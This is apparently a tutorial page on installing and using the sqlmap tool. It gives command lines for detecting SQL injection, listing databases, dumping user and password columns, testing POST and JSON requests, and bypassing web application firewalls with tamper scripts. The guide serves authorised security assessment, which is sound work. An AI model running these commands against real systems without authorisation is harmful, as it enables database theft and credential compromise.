EN
ENNA

Getting Started Guide

How to Install and Use sqlmap

This guide covers installing sqlmap, testing for SQL injection, extracting databases, and using it effectively during web application assessments.

Prerequisites

  • -Python 3
  • -A target URL with parameters you have permission to test
Official Documentation
1

Install sqlmap

Install sqlmap from your package manager or clone from GitHub.

Debian/Ubuntu

sudo apt install sqlmap

pip

pip install sqlmap

Verify

sqlmap --version
2

Test a URL for SQL Injection

Point sqlmap at a URL with a parameter and let it test for injection.

Basic test

sqlmap -u "http://target.com/page?id=1"

With cookie auth

sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123"

Note: sqlmap will ask you questions during the scan - usually the defaults are fine. Add --batch to auto-accept defaults for unattended scans.

3

Enumerate Databases

Once sqlmap confirms injection, enumerate the database structure.

List databases

sqlmap -u "http://target.com/page?id=1" --dbs

List tables in a database

sqlmap -u "http://target.com/page?id=1" -D targetdb --tables

List columns in a table

sqlmap -u "http://target.com/page?id=1" -D targetdb -T users --columns
4

Extract Data

Dump specific tables or columns from the database.

Dump a table

sqlmap -u "http://target.com/page?id=1" -D targetdb -T users --dump

Specific columns only

sqlmap -u "http://target.com/page?id=1" -D targetdb -T users -C username,password --dump

First 10 rows

sqlmap -u "http://target.com/page?id=1" -D targetdb -T users --dump --start=1 --stop=10

Note: sqlmap will automatically attempt to crack password hashes it finds using its built-in dictionary. You can also export hashes to crack with hashcat.

5

POST Request and Form Testing

Test POST parameters and form submissions, not just URL parameters.

POST data

sqlmap -u "http://target.com/login" --data="username=admin&password=test" -p username

From Burp request file

sqlmap -r request.txt

JSON body

sqlmap -u "http://target.com/api/search" --data='{"query":"test"}' --content-type="application/json"

Note: The -r flag reads a full HTTP request saved from Burp Suite. This is the easiest way to test complex requests with cookies, headers, and custom content types.

6

Useful Flags

Common flags for real-world usage.

Auto-accept defaults

sqlmap -u "http://target.com/page?id=1" --batch

Increase aggressiveness

sqlmap -u "http://target.com/page?id=1" --level=3 --risk=2

Use specific technique

sqlmap -u "http://target.com/page?id=1" --technique=BEU

Tamper scripts (WAF bypass)

sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,between

Note: Level 1-5 controls how many parameters/injection points to test. Risk 1-3 controls how dangerous the payloads are. Level 3 risk 2 is a good balance for thorough testing.

Back to sqlmapFull Documentation